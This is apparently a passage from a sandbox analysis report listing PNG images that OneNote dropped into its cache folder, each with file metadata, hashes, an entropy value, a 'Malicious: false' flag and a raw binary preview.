Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
